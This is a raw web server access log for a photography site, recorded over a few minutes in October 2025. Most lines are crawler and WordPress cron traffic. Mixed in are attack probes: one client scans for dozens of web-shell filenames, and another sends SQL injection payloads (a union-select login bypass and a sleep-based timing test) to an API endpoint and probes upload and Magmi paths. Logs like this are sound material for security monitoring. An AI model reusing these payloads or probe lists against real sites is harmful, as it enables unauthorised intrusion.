40.77.167.108 - - [18/Oct/2025:08:44:44 -0400] "GET /robots.txt HTTP/1.1" 200 84 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:08:44:39 -0400] "POST /session/create HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15"
66.249.64.105 - - [18/Oct/2025:08:44:50 -0400] "GET /categories/12552808 HTTP/1.1" 200 28996 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.105 - - [18/Oct/2025:08:44:51 -0400] "GET /products5666032?kg=0005597017 HTTP/1.1" 200 28856 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.106 - - [18/Oct/2025:08:45:01 -0400] "GET /categories/1222586 HTTP/1.1" 200 28999 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
98.70.29.56 - - [18/Oct/2025:08:45:09 -0400] "POST /wp-login.php HTTP/1.1" 200 6564 "-" "Mozilla/5.0"
51.79.229.86 - - [18/Oct/2025:08:45:11 -0400] "GET /bxb.php HTTP/1.1" 404 10906 "http://salhab360photos.com/bxb.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:08:45:11 -0400] "GET /products186473990?kg=0184199998 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.254 - - [18/Oct/2025:08:45:16 -0400] "GET /products60920838?kg=0060177982 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.64.105 - - [18/Oct/2025:08:45:29 -0400] "GET /?products3213994?kg=0003174880 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.229.86 - - [18/Oct/2025:08:45:31 -0400] "GET /hxh.php HTTP/1.1" 404 10902 "http://salhab360photos.com/hxh.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:45:38 -0400] "GET /hz.php HTTP/1.1" 404 10896 "http://salhab360photos.com/hz.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:08:45:39 -0400] "GET /products203580498?kg=0201097892 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:08:44:51 -0400] "GET /avanza.php HTTP/1.1" 404 10899 "http://salhab360photos.com/avanza.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:45:03 -0400] "GET /cakil.php HTTP/1.1" 404 10903 "http://salhab360photos.com/cakil.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:08:45:04 -0400] "GET /products218255428?kg=0215593859 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:08:45:17 -0400] "POST /wp-cron.php?doing_wp_cron=1760791517.1581621170043945312500 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
51.79.229.86 - - [18/Oct/2025:08:45:20 -0400] "GET /cxc.php HTTP/1.1" 404 10906 "http://salhab360photos.com/cxc.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:08:45:27 -0400] "GET /products135557608?kg=0133904549 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.105 - - [18/Oct/2025:08:45:41 -0400] "GET /products4549282?kg=0004493884 HTTP/1.1" 200 29014 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.229.86 - - [18/Oct/2025:08:45:45 -0400] "GET /ixi.php HTTP/1.1" 404 10903 "http://salhab360photos.com/ixi.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:08:45:59 -0400] "GET /products148360956?kg=0146551759 HTTP/1.1" 404 9744 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.107 - - [18/Oct/2025:08:46:08 -0400] "GET /categories/12215332 HTTP/1.1" 200 28666 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; GoogleOther)"
51.79.229.86 - - [18/Oct/2025:08:46:05 -0400] "GET /kxk.php HTTP/1.1" 404 10899 "http://salhab360photos.com/kxk.php" "Go-http-client/2.0"
185.61.153.107 - - [18/Oct/2025:08:46:21 -0400] "POST /wp-cron.php?doing_wp_cron=1760791581.1563549041748046875000 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:08:46:14 -0400] "GET /products153854190?kg=0151978002 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:08:46:15 -0400] "GET /lxl.php HTTP/1.1" 404 10903 "http://salhab360photos.com/lxl.php" "Go-http-client/2.0"
20.171.207.254 - - [18/Oct/2025:08:46:20 -0400] "GET /products60895122?kg=0060152580 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.229.86 - - [18/Oct/2025:08:46:24 -0400] "GET /axis.php HTTP/1.1" 404 10903 "http://salhab360photos.com/axis.php" "Go-http-client/2.0"
66.249.64.105 - - [18/Oct/2025:08:46:32 -0400] "GET /?products13493514?kg=0013329040 HTTP/1.1" 304 0 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.229.86 - - [18/Oct/2025:08:46:40 -0400] "GET /tri.php HTTP/1.1" 404 10899 "http://salhab360photos.com/tri.php" "Go-http-client/2.0"
66.249.64.105 - - [18/Oct/2025:08:46:45 -0400] "GET /?products122874002?kg=0121375620 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:08:46:48 -0400] "GET /graph_realtime.php?action=init HTTP/1.1" 404 10903 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15"
66.249.64.105 - - [18/Oct/2025:08:45:54 -0400] "GET /products13485752?kg=0013321373 HTTP/1.1" 200 29152 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.229.86 - - [18/Oct/2025:08:45:55 -0400] "GET /jxj.php HTTP/1.1" 404 10906 "http://salhab360photos.com/jxj.php" "Go-http-client/2.0"
66.249.64.106 - - [18/Oct/2025:08:46:07 -0400] "GET /?products14141228?kg=0013968855 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.105 - - [18/Oct/2025:08:46:19 -0400] "GET /?products14469442?kg=0014293068 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.105 - - [18/Oct/2025:08:46:32 -0400] "GET /?products1896332?kg=0001873287 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.229.86 - - [18/Oct/2025:08:46:29 -0400] "GET /indosat.php HTTP/1.1" 404 10897 "http://salhab360photos.com/indosat.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:46:36 -0400] "GET /telkomsel.php HTTP/1.1" 404 10903 "http://salhab360photos.com/telkomsel.php" "Go-http-client/2.0"
66.249.64.105 - - [18/Oct/2025:08:46:49 -0400] "GET /categories/12269452 HTTP/1.1" 200 30064 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.229.86 - - [18/Oct/2025:08:46:45 -0400] "GET /mxm.php HTTP/1.1" 404 10900 "http://salhab360photos.com/mxm.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:08:46:48 -0400] "POST /getcfg.php HTTP/1.1" 404 10855 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15"
51.79.229.86 - - [18/Oct/2025:08:46:51 -0400] "GET /nxn.php HTTP/1.1" 404 10903 "http://salhab360photos.com/nxn.php" "Go-http-client/2.0"
66.249.64.106 - - [18/Oct/2025:08:47:02 -0400] "GET /?products2562454?kg=0002531286 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.229.86 - - [18/Oct/2025:08:47:00 -0400] "GET /qxq.php HTTP/1.1" 404 10903 "http://salhab360photos.com/qxq.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:47:04 -0400] "GET /sxs.php HTTP/1.1" 404 10905 "http://salhab360photos.com/sxs.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:08:47:05 -0400] "POST /v1/submissions/create HTTP/1.1" 404 12309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15"
185.61.153.107 - - [18/Oct/2025:08:47:15 -0400] "POST /wp-cron.php?doing_wp_cron=1760791635.2533259391784667968750 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:08:47:10 -0400] "GET /products34943238?kg=0034517182 HTTP/1.1" 404 9733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:08:47:11 -0400] "GET /txt.php HTTP/1.1" 404 10897 "http://salhab360photos.com/txt.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:46:55 -0400] "GET /oxo.php HTTP/1.1" 404 10905 "http://salhab360photos.com/oxo.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:08:46:57 -0400] "GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0"
157.20.32.210 - - [18/Oct/2025:08:47:01 -0400] "GET /?app=main&inc=core_auth&route=login HTTP/1.1" 200 1404 "https://salhab360photos.com/index.php?app=main&inc=core_auth&route=login" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0"
66.249.64.106 - - [18/Oct/2025:08:47:14 -0400] "GET /?products14467552?kg=0014291201 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.105 - - [18/Oct/2025:08:47:24 -0400] "GET /?products12191186?kg=0012042596 HTTP/1.1" 304 0 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.229.86 - - [18/Oct/2025:08:47:20 -0400] "GET /uxu.php HTTP/1.1" 404 10900 "http://salhab360photos.com/uxu.php" "Go-http-client/2.0"
20.171.207.254 - - [18/Oct/2025:08:47:20 -0400] "GET /products60900370?kg=0060157764 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:08:47:27 -0400] "POST /graphql HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:08:47:38 -0400] "POST /graphql HTTP/1.1" 404 10847 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
66.249.64.105 - - [18/Oct/2025:08:47:50 -0400] "GET /?products121550814?kg=0120068570 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.105 - - [18/Oct/2025:08:47:24 -0400] "GET /?products2229498?kg=0002202392 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.105 - - [18/Oct/2025:08:47:38 -0400] "GET /?products121712928?kg=0120228705 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.229.86 - - [18/Oct/2025:08:47:36 -0400] "GET /vxv.php HTTP/1.1" 404 10898 "http://salhab360photos.com/vxv.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:47:42 -0400] "GET /yxy.php HTTP/1.1" 404 10903 "http://salhab360photos.com/yxy.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:47:46 -0400] "GET /zxz.php HTTP/1.1" 404 10896 "http://salhab360photos.com/zxz.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:47:51 -0400] "GET /click.php HTTP/1.1" 404 10903 "http://salhab360photos.com/click.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:08:47:57 -0400] "GET /eonapi/getApiKey?username=%27%20union%20select%201,%27admin%27,%271c85d47ff80b5ff2a4dd577e8e5f8e9d%27,0,0,1,1,8%20or%20%27&password=h4knet HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:08:48:00 -0400] "GET /eonapi/getApiKey?username=%27%20union%20select%20sleep(6),0,0,0,0,0,0,0%20or%20%27 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.4.4 (KHTML, like Gecko) Version/9.0.3 Safari/537.86.4"
216.73.216.159 - - [18/Oct/2025:08:47:58 -0400] "GET /products179027602?kg=0176844420 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.106 - - [18/Oct/2025:08:48:07 -0400] "GET /?ctg/search/similarImageSearchResultView/?ctgItemCd=97350 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.61.153.107 - - [18/Oct/2025:08:48:21 -0400] "POST /wp-cron.php?doing_wp_cron=1760791700.8562529087066650390625 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:08:48:29 -0400] "POST / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"
157.20.32.210 - - [18/Oct/2025:08:48:29 -0400] "POST / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
51.79.229.86 - - [18/Oct/2025:08:48:15 -0400] "GET /him.php HTTP/1.1" 404 10906 "http://salhab360photos.com/him.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:08:48:20 -0400] "POST /upload HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
20.171.207.254 - - [18/Oct/2025:08:48:24 -0400] "GET /products60904844?kg=0060162183 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:08:48:31 -0400] "POST /upload HTTP/1.1" 404 10855 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:08:48:29 -0400] "GET /products159617920?kg=0157671441 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.105 - - [18/Oct/2025:08:48:46 -0400] "GET /?products2879836?kg=0002844799 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.229.86 - - [18/Oct/2025:08:48:42 -0400] "GET /h4x0r.php HTTP/1.1" 404 10906 "http://salhab360photos.com/h4x0r.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:48:54 -0400] "GET /eval.php HTTP/1.1" 404 10906 "http://salhab360photos.com/eval.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:48:58 -0400] "GET /web.PHP HTTP/1.1" 404 10898 "http://salhab360photos.com/web.PHP" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:49:05 -0400] "GET /affahiyah.php HTTP/1.1" 404 10906 "http://salhab360photos.com/affahiyah.php" "Go-http-client/2.0"
185.61.153.107 - - [18/Oct/2025:08:49:16 -0400] "POST /wp-cron.php?doing_wp_cron=1760791756.0532839298248291015625 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
51.79.229.86 - - [18/Oct/2025:08:49:17 -0400] "GET /lun.php HTTP/1.1" 404 10905 "http://salhab360photos.com/lun.php" "Go-http-client/2.0"
66.249.64.106 - - [18/Oct/2025:08:49:26 -0400] "GET /?products5984738?kg=0005911836 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.254 - - [18/Oct/2025:08:49:27 -0400] "GET /products60883442?kg=0060141044 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.229.86 - - [18/Oct/2025:08:47:56 -0400] "GET /clicks.php HTTP/1.1" 404 10903 "http://salhab360photos.com/clicks.php" "Go-http-client/2.0"
66.249.64.105 - - [18/Oct/2025:08:48:06 -0400] "GET /?products3350242?kg=0003309468 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.229.86 - - [18/Oct/2025:08:48:02 -0400] "GET /here.php HTTP/1.1" 404 10903 "http://salhab360photos.com/here.php" "Go-http-client/2.0"
66.249.64.105 - - [18/Oct/2025:08:48:19 -0400] "GET /?products13310108?kg=0013147871 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.82.22.214 - - [18/Oct/2025:08:48:09 -0400] "POST /xmlrpc.php HTTP/1.1" 200 205 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; MDDSJS; rv:11.0) like Gecko"
66.249.64.105 - - [18/Oct/2025:08:48:34 -0400] "GET /?products7694024?kg=0007600277 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.229.86 - - [18/Oct/2025:08:48:30 -0400] "GET /is.php HTTP/1.1" 404 10896 "http://salhab360photos.com/is.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:08:48:46 -0400] "GET /products76576310?kg=0075642534 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:08:48:47 -0400] "GET /s3ll.php HTTP/1.1" 404 10899 "http://salhab360photos.com/s3ll.php" "Go-http-client/2.0"
66.249.64.105 - - [18/Oct/2025:08:48:58 -0400] "GET /?products7866474?kg=0007770624 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.107 - - [18/Oct/2025:08:49:14 -0400] "GET /?products14138394?kg=0013966056 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.229.86 - - [18/Oct/2025:08:49:11 -0400] "GET /laron.php HTTP/1.1" 404 10906 "http://salhab360photos.com/laron.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:08:49:16 -0400] "GET /products73887048?kg=0072986069 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:08:49:20 -0400] "POST /magmi/web/magmi_saveprofile.php HTTP/1.1" 404 12308 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15"
51.79.229.86 - - [18/Oct/2025:08:49:24 -0400] "GET /lea.php HTTP/1.1" 404 10906 "http://salhab360photos.com/lea.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:08:49:28 -0400] "POST /magmi/web/magmi_run.php HTTP/1.1" 404 12314 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
66.249.64.105 - - [18/Oct/2025:08:49:37 -0400] "GET /?products11947646?kg=0011802026 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.229.86 - - [18/Oct/2025:08:49:32 -0400] "GET /lan.php HTTP/1.1" 404 10906 "http://salhab360photos.com/lan.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:08:49:45 -0400] "GET /products173208108?kg=0171095895 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.105 - - [18/Oct/2025:08:49:54 -0400] "GET /?products122542818?kg=0121048476 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.105 - - [18/Oct/2025:08:50:06 -0400] "GET /?products13986166?kg=0013815686 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.229.86 - - [18/Oct/2025:08:50:12 -0400] "GET /GeGe.php HTTP/1.1" 404 10898 "http://salhab360photos.com/GeGe.php" "Go-http-client/2.0"
66.249.64.106 - - [18/Oct/2025:08:50:18 -0400] "GET /?products122705082?kg=0121208760 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
52.204.89.12 - - [18/Oct/2025:08:50:16 -0400] "GET /portfolio/tag/watter/ HTTP/1.1" 200 12585 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.79.229.86 - - [18/Oct/2025:08:50:18 -0400] "GET /GG.php HTTP/1.1" 404 10896 "http://salhab360photos.com/GG.php" "Go-http-client/2.0"
81.200.10.200 - - [18/Oct/2025:08:50:23 -0400] "GET /tinyfilemanager/tinyfilemanager.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36"
66.249.64.105 - - [18/Oct/2025:08:50:30 -0400] "GET /?products121545284?kg=0120063107 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
